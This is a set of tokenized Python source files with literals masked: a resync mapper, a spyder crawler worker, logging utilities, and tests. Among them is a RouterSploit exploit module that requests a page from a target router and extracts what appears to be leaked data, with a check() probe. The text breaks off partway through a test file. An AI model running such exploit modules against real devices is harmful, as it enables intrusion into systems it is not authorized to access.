<EOL> if ( len ( l ) != <NUM_LIT:2> ) : <EOL> raise MapperError ( "<STR_LIT>" % ( mapping , str ( l ) ) ) <EOL> ( src_uri , dst_path ) = l <EOL> for map in self . mappings : <EOL> if ( src_uri == map . src_uri ) : <EOL> raise MapperError ( "<STR_LIT>" % ( src_uri , dst_path ) ) <EOL> if ( dst_path == map . dst_path ) : <EOL> raise MapperError ( "<STR_LIT>" % ( dst_path , src_uri ) ) <EOL> self . mappings . append ( Map ( src_uri , dst_path ) ) <EOL> def default_src_uri ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( self . 
mappings ) > <NUM_LIT:0> ) : <EOL> return ( self . mappings [ <NUM_LIT:0> ] . src_uri ) <EOL> raise MapperError ( "<STR_LIT>" ) <EOL> def unsafe ( self ) : <EOL> """<STR_LIT>""" <EOL> for map in self . mappings : <EOL> if ( map . unsafe ( ) ) : <EOL> return ( True ) <EOL> return ( False ) <EOL> def dst_to_src ( self , dst_file ) : <EOL> """<STR_LIT>""" <EOL> for map in self . mappings : <EOL> src_uri = map . dst_to_src ( dst_file ) <EOL> if ( src_uri is not None ) : <EOL> return ( src_uri ) <EOL> raise MapperError ( "<STR_LIT>" % ( dst_file ) ) <EOL> def src_to_dst ( self , src_uri ) : <EOL> """<STR_LIT>""" <EOL> for map in self . mappings : <EOL> dst_path = map . src_to_dst ( src_uri ) <EOL> if ( dst_path is not None ) : <EOL> return ( dst_path ) <EOL> raise MapperError ( "<STR_LIT>" % ( src_uri ) ) <EOL> def path_from_uri ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> ( scheme , netloc , path , params , query , fragment ) = urlparse ( uri ) <EOL> if ( netloc == '<STR_LIT>' ) : <EOL> return ( uri ) <EOL> path = '<STR_LIT:/>' . join ( [ netloc , path ] ) <EOL> path = re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , path ) <EOL> path = re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , path ) <EOL> path = re . sub ( '<STR_LIT>' , '<STR_LIT>' , path ) <EOL> path = re . sub ( '<STR_LIT>' , '<STR_LIT>' , path ) <EOL> return ( path ) <EOL> def __repr__ ( self ) : <EOL> s = '<STR_LIT>' % ( len ( self . mappings ) ) <EOL> for map in self . mappings : <EOL> s += str ( map ) + '<STR_LIT:\n>' <EOL> return ( s ) <EOL> class Map : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , src_uri = None , dst_path = None ) : <EOL> self . src_uri = self . strip_trailing_slashes ( src_uri ) <EOL> self . dst_path = self . strip_trailing_slashes ( dst_path ) <EOL> def strip_trailing_slashes ( self , path ) : <EOL> """<STR_LIT>""" <EOL> m = re . match ( r"<STR_LIT>" , path ) <EOL> if ( m is None ) : <EOL> return ( path ) <EOL> return ( m . 
group ( <NUM_LIT:1> ) ) <EOL> def dst_to_src ( self , dst_file ) : <EOL> """<STR_LIT>""" <EOL> m = re . match ( self . dst_path + "<STR_LIT>" , dst_file ) <EOL> if ( m is None ) : <EOL> return ( None ) <EOL> rel_path = m . group ( <NUM_LIT:1> ) <EOL> return ( self . src_uri + '<STR_LIT:/>' + rel_path ) <EOL> def src_to_dst ( self , src_uri ) : <EOL> """<STR_LIT>""" <EOL> m = re . match ( self . src_uri + "<STR_LIT>" , src_uri ) <EOL> if ( m is None ) : <EOL> return ( None ) <EOL> rel_path = m . group ( <NUM_LIT:1> ) <EOL> return ( self . dst_path + '<STR_LIT:/>' + rel_path ) <EOL> def unsafe ( self ) : <EOL> """<STR_LIT>""" <EOL> ( scheme , netloc , path , params , query , fragment ) = urlparse ( self . src_uri ) <EOL> if ( scheme != '<STR_LIT>' ) : <EOL> return ( False ) <EOL> s = os . path . normpath ( self . src_uri ) <EOL> d = os . path . normpath ( self . dst_path ) <EOL> lcp = os . path . commonprefix ( [ s , d ] ) <EOL> return ( s == lcp or d == lcp ) <EOL> def __repr__ ( self ) : <EOL> return ( "<STR_LIT>" % ( self . src_uri , self . dst_path ) ) </s>
<s> import unittest <EOL> from resync . mapper import Mapper , MapperError , Map <EOL> class TestMapper ( unittest . TestCase ) : <EOL> def test00_mapper_creation ( self ) : <EOL> m1 = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( m1 ) , <NUM_LIT:1> ) <EOL> m2 = Mapper ( mappings = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( m2 ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( str ( m1 ) , str ( m2 ) ) <EOL> m3 = Mapper ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( m3 ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( str ( m1 ) , str ( m3 ) ) <EOL> m4 = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> m5 = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( m4 ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( m5 ) , <NUM_LIT:2> ) <EOL> self . assertNotEqual ( str ( m4 ) , str ( m5 ) ) <EOL> def test01_mapper_src_to_dst ( self ) : <EOL> m = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . src_to_dst , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . src_to_dst , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . src_to_dst , '<STR_LIT>' ) <EOL> def test02_mapper_dst_to_src ( self ) : <EOL> m = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . dst_to_src , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . dst_to_src , '<STR_LIT>' ) <EOL> self . assertRaises ( MapperError , m . 
dst_to_src , '<STR_LIT>' ) <EOL> def test03_mapper2_src_to_dst ( self ) : <EOL> m = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . src_to_dst ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test04_mapper2_dst_to_src ( self ) : <EOL> m = Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . dst_to_src ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test05_path_from_uri ( self ) : <EOL> m = Mapper ( ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( m . path_from_uri ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test06_mapper_unsafe ( self ) : <EOL> self . assertFalse ( Mapper ( [ '<STR_LIT>' ] ) . unsafe ( ) ) <EOL> self . assertFalse ( Mapper ( [ '<STR_LIT>' ] ) . unsafe ( ) ) <EOL> self . assertFalse ( Mapper ( [ '<STR_LIT>' ] , use_default_path = True ) . unsafe ( ) ) <EOL> self . assertTrue ( Mapper ( [ '<STR_LIT>' ] , use_default_path = True ) . unsafe ( ) ) <EOL> self . 
assertTrue ( Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) . unsafe ( ) ) <EOL> def test07_default_src_uri ( self ) : <EOL> self . assertEqual ( Mapper ( [ '<STR_LIT>' ] ) . default_src_uri ( ) , '<STR_LIT:a>' ) <EOL> self . assertEqual ( Mapper ( [ '<STR_LIT>' , '<STR_LIT>' ] ) . default_src_uri ( ) , '<STR_LIT:a>' ) <EOL> self . assertRaises ( MapperError , Mapper ( ) . default_src_uri ) <EOL> def test10_map_unsafe ( self ) : <EOL> self . assertFalse ( Map ( '<STR_LIT>' , '<STR_LIT:path>' ) . unsafe ( ) ) <EOL> self . assertFalse ( Map ( '<STR_LIT>' , '<STR_LIT>' ) . unsafe ( ) ) <EOL> self . assertFalse ( Map ( '<STR_LIT:a>' , '<STR_LIT:b>' ) . unsafe ( ) ) <EOL> self . assertFalse ( Map ( '<STR_LIT>' , '<STR_LIT>' ) . unsafe ( ) ) <EOL> self . assertTrue ( Map ( '<STR_LIT:path>' , '<STR_LIT:path>' ) . unsafe ( ) ) <EOL> self . assertTrue ( Map ( '<STR_LIT>' , '<STR_LIT:path>' ) . unsafe ( ) ) <EOL> self . assertTrue ( Map ( '<STR_LIT:path>' , '<STR_LIT>' ) . unsafe ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> suite = unittest . defaultTestLoader . loadTestsFromTestCase ( TestMapper ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) </s>
<s> """<STR_LIT>""" <EOL> import random <EOL> class BiasedQueueSelector ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , number_of_queues ) : <EOL> """<STR_LIT>""" <EOL> self . _weights = [ ] <EOL> self . _sum_weights = <NUM_LIT:0> <EOL> self . _enumerate_weights = [ ] <EOL> self . reset_queues ( number_of_queues ) <EOL> def reset_queues ( self , number_of_queues ) : <EOL> self . _weights = [ <NUM_LIT:1> / ( float ( i ) * number_of_queues ) <EOL> for i in range ( <NUM_LIT:1> , number_of_queues + <NUM_LIT:1> ) ] <EOL> self . _sum_weights = sum ( self . _weights ) <EOL> self . _enumerate_weights = [ ( i , w ) for i , w in enumerate ( self . _weights ) ] <EOL> def get_queue ( self ) : <EOL> """<STR_LIT>""" <EOL> random_weight = random . random ( ) * self . _sum_weights <EOL> for ( i , weight ) in self . _enumerate_weights : <EOL> random_weight -= weight <EOL> if random_weight < <NUM_LIT:0> : <EOL> return i </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import os <EOL> import signal <EOL> import socket <EOL> import traceback <EOL> import zmq <EOL> from zmq . core . error import ZMQError <EOL> from zmq . eventloop . ioloop import IOLoop , DelayedCallback <EOL> from zmq . log . handlers import PUBHandler <EOL> from spyder . import_util import import_class <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER_AVAIL <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER_QUIT <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER_QUIT_ACK <EOL> from spyder . core . messages import MgmtMessage <EOL> from spyder . core . mgmt import ZmqMgmt <EOL> from spyder . core . worker import ZmqWorker , AsyncZmqWorker <EOL> from spyder . processor . fetcher import FetchProcessor <EOL> def create_worker_management ( settings , zmq_context , io_loop ) : <EOL> """<STR_LIT>""" <EOL> listening_socket = zmq_context . socket ( zmq . SUB ) <EOL> listening_socket . setsockopt ( zmq . SUBSCRIBE , "<STR_LIT>" ) <EOL> listening_socket . connect ( settings . ZEROMQ_MGMT_MASTER ) <EOL> publishing_socket = zmq_context . socket ( zmq . PUB ) <EOL> publishing_socket . connect ( settings . ZEROMQ_MGMT_WORKER ) <EOL> return ZmqMgmt ( listening_socket , publishing_socket , io_loop = io_loop ) <EOL> def create_worker_fetcher ( settings , mgmt , zmq_context , log_handler , io_loop ) : <EOL> """<STR_LIT>""" <EOL> pulling_socket = zmq_context . socket ( zmq . PULL ) <EOL> pulling_socket . connect ( settings . ZEROMQ_WORKER_PROC_FETCHER_PULL ) <EOL> pushing_socket = zmq_context . socket ( zmq . PUSH ) <EOL> pushing_socket . setsockopt ( zmq . HWM , <EOL> settings . ZEROMQ_WORKER_PROC_FETCHER_PUSH_HWM ) <EOL> pushing_socket . bind ( settings . 
ZEROMQ_WORKER_PROC_FETCHER_PUSH ) <EOL> fetcher = FetchProcessor ( settings , io_loop ) <EOL> return AsyncZmqWorker ( pulling_socket , pushing_socket , mgmt , fetcher , <EOL> log_handler , settings . LOG_LEVEL_WORKER , io_loop ) <EOL> def create_processing_function ( settings , pipeline ) : <EOL> """<STR_LIT>""" <EOL> processors = [ ] <EOL> for processor in pipeline : <EOL> processor_class = import_class ( processor ) <EOL> processors . append ( processor_class ( settings ) ) <EOL> def processing ( data_message ) : <EOL> """<STR_LIT>""" <EOL> next_message = data_message <EOL> for processor in processors : <EOL> next_message = processor ( next_message ) <EOL> return next_message <EOL> return processing <EOL> def create_worker_extractor ( settings , mgmt , zmq_context , log_handler , io_loop ) : <EOL> """<STR_LIT>""" <EOL> pipeline = settings . SPYDER_EXTRACTOR_PIPELINE <EOL> pipeline . extend ( settings . SPYDER_SCOPER_PIPELINE ) <EOL> processing = create_processing_function ( settings , pipeline ) <EOL> pulling_socket = zmq_context . socket ( zmq . PULL ) <EOL> pulling_socket . connect ( settings . ZEROMQ_WORKER_PROC_EXTRACTOR_PULL ) <EOL> pushing_socket = zmq_context . socket ( zmq . PUB ) <EOL> pushing_socket . setsockopt ( zmq . HWM , <EOL> settings . ZEROMQ_WORKER_PROC_EXTRACTOR_PUB_HWM ) <EOL> pushing_socket . connect ( settings . ZEROMQ_WORKER_PROC_EXTRACTOR_PUB ) <EOL> return ZmqWorker ( pulling_socket , pushing_socket , mgmt , processing , <EOL> log_handler , settings . LOG_LEVEL_WORKER , io_loop = io_loop ) <EOL> def main ( settings ) : <EOL> """<STR_LIT>""" <EOL> identity = "<STR_LIT>" % ( socket . gethostname ( ) , os . getpid ( ) ) <EOL> ctx = zmq . Context ( ) <EOL> io_loop = IOLoop . instance ( ) <EOL> log_pub = ctx . socket ( zmq . PUB ) <EOL> log_pub . connect ( settings . ZEROMQ_LOGGING ) <EOL> zmq_logging_handler = PUBHandler ( log_pub ) <EOL> zmq_logging_handler . root_topic = "<STR_LIT>" <EOL> logger = logging . getLogger ( ) <EOL> logger . 
addHandler ( zmq_logging_handler ) <EOL> logger . setLevel ( settings . LOG_LEVEL_WORKER ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> mgmt = create_worker_management ( settings , ctx , io_loop ) <EOL> logger . debug ( "<STR_LIT>" ) <EOL> fetcher = create_worker_fetcher ( settings , mgmt , ctx , zmq_logging_handler , <EOL> io_loop ) <EOL> fetcher . start ( ) <EOL> extractor = create_worker_extractor ( settings , mgmt , ctx , <EOL> zmq_logging_handler , io_loop ) <EOL> extractor . start ( ) <EOL> def quit_worker ( raw_msg ) : <EOL> """<STR_LIT>""" <EOL> msg = MgmtMessage ( raw_msg ) <EOL> if ZMQ_SPYDER_MGMT_WORKER_QUIT == msg . data : <EOL> logger . info ( "<STR_LIT>" ) <EOL> DelayedCallback ( io_loop . stop , <NUM_LIT> , io_loop ) . start ( ) <EOL> ack = MgmtMessage ( topic = ZMQ_SPYDER_MGMT_WORKER , identity = identity , <EOL> data = ZMQ_SPYDER_MGMT_WORKER_QUIT_ACK ) <EOL> mgmt . _out_stream . send_multipart ( ack . serialize ( ) ) <EOL> mgmt . add_callback ( ZMQ_SPYDER_MGMT_WORKER , quit_worker ) <EOL> mgmt . start ( ) <EOL> msg = MgmtMessage ( topic = ZMQ_SPYDER_MGMT_WORKER , identity = identity , <EOL> data = ZMQ_SPYDER_MGMT_WORKER_AVAIL ) <EOL> mgmt . _out_stream . send_multipart ( msg . serialize ( ) ) <EOL> def handle_shutdown_signal ( _sig , _frame ) : <EOL> """<STR_LIT>""" <EOL> msg = MgmtMessage ( data = ZMQ_SPYDER_MGMT_WORKER_QUIT ) <EOL> quit_worker ( msg . serialize ( ) ) <EOL> io_loop . start ( ) <EOL> signal . signal ( signal . SIGINT , handle_shutdown_signal ) <EOL> signal . signal ( signal . SIGTERM , handle_shutdown_signal ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> try : <EOL> io_loop . start ( ) <EOL> except ZMQError : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> logger . debug ( traceback . format_exc ( ) ) <EOL> for mod in [ fetcher , extractor , mgmt ] : <EOL> mod . close ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> ctx . term ( ) </s>
<s> import unittest <EOL> import time <EOL> import zmq <EOL> from zmq . eventloop . ioloop import IOLoop <EOL> from zmq . eventloop . zmqstream import ZMQStream <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER_QUIT <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER_QUIT_ACK <EOL> from spyder . core . messages import MgmtMessage <EOL> from spyder . core . settings import Settings <EOL> from spyder . processor import limiter <EOL> from spyder import workerprocess <EOL> class WorkerProcessTestCase ( unittest . TestCase ) : <EOL> def test_that_creating_mgmt_works ( self ) : <EOL> ctx = zmq . Context ( ) <EOL> io_loop = IOLoop . instance ( ) <EOL> def stop_looping ( _msg ) : <EOL> io_loop . stop ( ) <EOL> settings = Settings ( ) <EOL> settings . ZEROMQ_MASTER_PUSH = '<STR_LIT>' <EOL> settings . ZEROMQ_WORKER_PROC_FETCHER_PULL = settings . ZEROMQ_MASTER_PUSH <EOL> settings . ZEROMQ_MASTER_SUB = '<STR_LIT>' <EOL> settings . ZEROMQ_WORKER_PROC_EXTRACTOR_PUB = settings . ZEROMQ_MASTER_SUB <EOL> settings . ZEROMQ_MGMT_MASTER = '<STR_LIT>' <EOL> settings . ZEROMQ_MGMT_WORKER = '<STR_LIT>' <EOL> pubsocket = ctx . socket ( zmq . PUB ) <EOL> pubsocket . bind ( settings . ZEROMQ_MGMT_MASTER ) <EOL> pub_stream = ZMQStream ( pubsocket , io_loop ) <EOL> subsocket = ctx . socket ( zmq . SUB ) <EOL> subsocket . setsockopt ( zmq . SUBSCRIBE , "<STR_LIT>" ) <EOL> subsocket . bind ( settings . ZEROMQ_MGMT_WORKER ) <EOL> sub_stream = ZMQStream ( subsocket , io_loop ) <EOL> mgmt = workerprocess . create_worker_management ( settings , ctx , io_loop ) <EOL> mgmt . add_callback ( ZMQ_SPYDER_MGMT_WORKER , stop_looping ) <EOL> mgmt . start ( ) <EOL> def assert_quit_message ( msg ) : <EOL> self . assertEqual ( ZMQ_SPYDER_MGMT_WORKER_QUIT_ACK , msg . data ) <EOL> sub_stream . 
on_recv ( assert_quit_message ) <EOL> death = MgmtMessage ( topic = ZMQ_SPYDER_MGMT_WORKER , <EOL> data = ZMQ_SPYDER_MGMT_WORKER_QUIT ) <EOL> pub_stream . send_multipart ( death . serialize ( ) ) <EOL> io_loop . start ( ) <EOL> mgmt . _out_stream . close ( ) <EOL> mgmt . _in_stream . close ( ) <EOL> mgmt . _publisher . close ( ) <EOL> mgmt . _subscriber . close ( ) <EOL> pub_stream . close ( ) <EOL> pubsocket . close ( ) <EOL> sub_stream . close ( ) <EOL> subsocket . close ( ) <EOL> ctx . term ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import ( <EOL> absolute_import , division , print_function , with_statement , <EOL> unicode_literals ) <EOL> import logging <EOL> import sys <EOL> from json import JSONEncoder <EOL> from builtins import * <EOL> module_hdlr = logging . StreamHandler ( sys . stdout ) <EOL> module_logger = logging . getLogger ( __name__ ) <EOL> module_logger . addHandler ( module_hdlr ) <EOL> class CustomEncoder ( JSONEncoder ) : <EOL> """<STR_LIT>""" <EOL> def default ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( obj , '<STR_LIT>' ) : <EOL> encoded = float ( obj ) <EOL> elif hasattr ( obj , '<STR_LIT>' ) : <EOL> encoded = tuple ( obj ) <EOL> elif set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . intersection ( dir ( obj ) ) : <EOL> encoded = list ( obj ) <EOL> else : <EOL> encoded = str ( obj ) <EOL> return encoded <EOL> class StructuredMessage ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs [ '<STR_LIT:message>' ] = message <EOL> self . kwargs = kwargs <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return str ( CustomEncoder ( ) . encode ( self . kwargs ) ) <EOL> class StructuredAdapter ( logging . LoggerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def process ( self , msg , kwargs ) : <EOL> """<STR_LIT>""" <EOL> extra = kwargs . get ( '<STR_LIT>' , { } ) <EOL> extra . update ( self . extra ) <EOL> kwargs [ '<STR_LIT>' ] = extra <EOL> return str ( StructuredMessage ( msg , ** extra ) ) , kwargs <EOL> class LogFilter ( logging . Filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , level ) : <EOL> """<STR_LIT>""" <EOL> self . high_level = level <EOL> def filter ( self , record ) : <EOL> """<STR_LIT>""" <EOL> return record . levelno < self . high_level <EOL> def get_structured_filter ( name = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> class StructuredFilter ( logging . 
Filter ) : <EOL> """<STR_LIT>""" <EOL> def filter ( self , record ) : <EOL> """<STR_LIT>""" <EOL> for k , v in kwargs . items ( ) : <EOL> setattr ( record , k , v ) <EOL> return True <EOL> return StructuredFilter ( name ) </s>
<s> import re <EOL> from routersploit import ( <EOL> exploits , <EOL> sanitize_url , <EOL> print_error , <EOL> print_success , <EOL> print_table , <EOL> http_request , <EOL> mute , <EOL> ) <EOL> class Exploit ( exploits . Exploit ) : <EOL> """<STR_LIT>""" <EOL> __info__ = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } <EOL> target = exploits . Option ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> port = exploits . Option ( <NUM_LIT> , '<STR_LIT>' ) <EOL> def run ( self ) : <EOL> url = sanitize_url ( "<STR_LIT>" . format ( self . target , self . port ) ) <EOL> response = http_request ( method = "<STR_LIT:GET>" , url = url ) <EOL> if response is None : <EOL> return <EOL> val = re . findall ( '<STR_LIT>' , response . text ) <EOL> if len ( val ) : <EOL> print_success ( "<STR_LIT>" ) <EOL> data = [ ( '<STR_LIT>' , val [ <NUM_LIT:0> ] ) ] <EOL> headers = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> print_table ( headers , * data ) <EOL> else : <EOL> print_error ( "<STR_LIT>" ) <EOL> @ mute <EOL> def check ( self ) : <EOL> url = sanitize_url ( "<STR_LIT>" . format ( self . target , self . port ) ) <EOL> response = http_request ( method = "<STR_LIT:GET>" , url = url ) <EOL> if response is None : <EOL> return False <EOL> val = re . findall ( '<STR_LIT>' , response . text ) <EOL> if len ( val ) : <EOL> return True <EOL> return False </s>
<s> from __future__ import print_function <EOL> import unittest <EOL> import os <EOL> import inspect <EOL> try : <EOL> import unittest . mock as mock <EOL> except ImportError : <EOL> import mock <EOL> from routersploit . interpreter import RoutersploitInterpreter <EOL> from routersploit . exploits import Exploit <EOL> class TestExploit ( Exploit ) : <EOL> pass <EOL> class RoutersploitInterpreterTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> RoutersploitInterpreter . setup = mock . Mock ( ) <EOL> self . interpreter = RoutersploitInterpreter ( ) <EOL> self . interpreter . current_module = mock . MagicMock ( ) <EOL> self . raw_prompt_default = "<STR_LIT>" <EOL> self . module_prompt_default = lambda x : "<STR_LIT>" . format ( x ) <EOL> def prepare_prompt_env_variables ( self , raw_prompt = None , module_prompt = None ) : <EOL> if raw_prompt : <EOL> os . environ [ "<STR_LIT>" ] = raw_prompt <EOL> else : <EOL> try : <EOL> os . environ [ "<STR_LIT>" ] <EOL> except KeyError : <EOL> pass <EOL> if module_prompt : <EOL> os . environ [ "<STR_LIT>" ] = module_prompt <EOL> else : <EOL> try : <EOL> del os . environ [ "<STR_LIT>" ] <EOL> except KeyError : <EOL> pass <EOL> getattr ( self . interpreter , '<STR_LIT>' . format ( self . interpreter . __class__ . __name__ ) ) ( ) <EOL> def assertIsDecorated ( self , function , decorator_name ) : <EOL> try : <EOL> decorator_list = function . __decorators__ <EOL> except AttributeError : <EOL> decorator_list = [ ] <EOL> self . assertIn ( <EOL> decorator_name , <EOL> decorator_list , <EOL> msg = "<STR_LIT>" . format ( function . __name__ ) <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_set ( self , mock_print_success ) : <EOL> rhost , new_rhost_value = '<STR_LIT>' , "<STR_LIT>" <EOL> port , new_port_value = '<STR_LIT>' , "<STR_LIT>" <EOL> self . interpreter . current_module . options = [ '<STR_LIT>' , '<STR_LIT:port>' ] <EOL> self . interpreter . current_module . rhost = rhost <EOL> self . interpreter . 
current_module . port = port <EOL> self . assertEqual ( self . interpreter . current_module . rhost , rhost ) <EOL> self . assertEqual ( self . interpreter . current_module . port , port ) <EOL> self . interpreter . command_set ( '<STR_LIT>' . format ( new_rhost_value ) ) <EOL> self . interpreter . command_set ( '<STR_LIT>' . format ( new_port_value ) ) <EOL> self . assertEqual ( self . interpreter . current_module . rhost , new_rhost_value ) <EOL> self . assertEqual ( self . interpreter . current_module . port , new_port_value ) <EOL> self . assertEqual ( <EOL> mock_print_success . mock_calls , <EOL> [ mock . call ( { '<STR_LIT>' : new_rhost_value } ) , mock . call ( { '<STR_LIT:port>' : new_port_value } ) ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_set_unknown_option ( self , mock_print_error ) : <EOL> unknown_option = "<STR_LIT>" <EOL> del self . interpreter . current_module . unknown <EOL> known_options = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . interpreter . current_module . options = known_options <EOL> self . interpreter . command_set ( '<STR_LIT>' . format ( unknown_option ) ) <EOL> self . assertEqual ( <EOL> mock_print_error . mock_calls , <EOL> [ mock . call ( "<STR_LIT>" . format ( unknown_option , known_options ) ) ] <EOL> ) <EOL> def test_command_run ( self ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_run : <EOL> self . interpreter . command_run ( ) <EOL> mock_run . assert_called_once_with ( ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_check_target_vulnerable ( self , mock_print_success ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_check : <EOL> mock_check . return_value = True <EOL> self . interpreter . command_check ( ) <EOL> mock_check . assert_called_once_with ( ) <EOL> mock_print_success . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . 
patch ( '<STR_LIT>' ) <EOL> def test_command_check_target_not_vulnerable ( self , print_error ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_check : <EOL> mock_check . return_value = False <EOL> self . interpreter . command_check ( ) <EOL> mock_check . assert_called_once_with ( ) <EOL> print_error . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_check_target_could_not_be_verified_1 ( self , print_status ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_check : <EOL> mock_check . return_value = "<STR_LIT>" <EOL> self . interpreter . command_check ( ) <EOL> mock_check . assert_called_once_with ( ) <EOL> print_status . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_check_target_could_not_be_verified_2 ( self , print_status ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_check : <EOL> mock_check . return_value = None <EOL> self . interpreter . command_check ( ) <EOL> mock_check . assert_called_once_with ( ) <EOL> print_status . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_run_exception_during_exploit_execution ( self , mock_print_error , mock_format_exc , 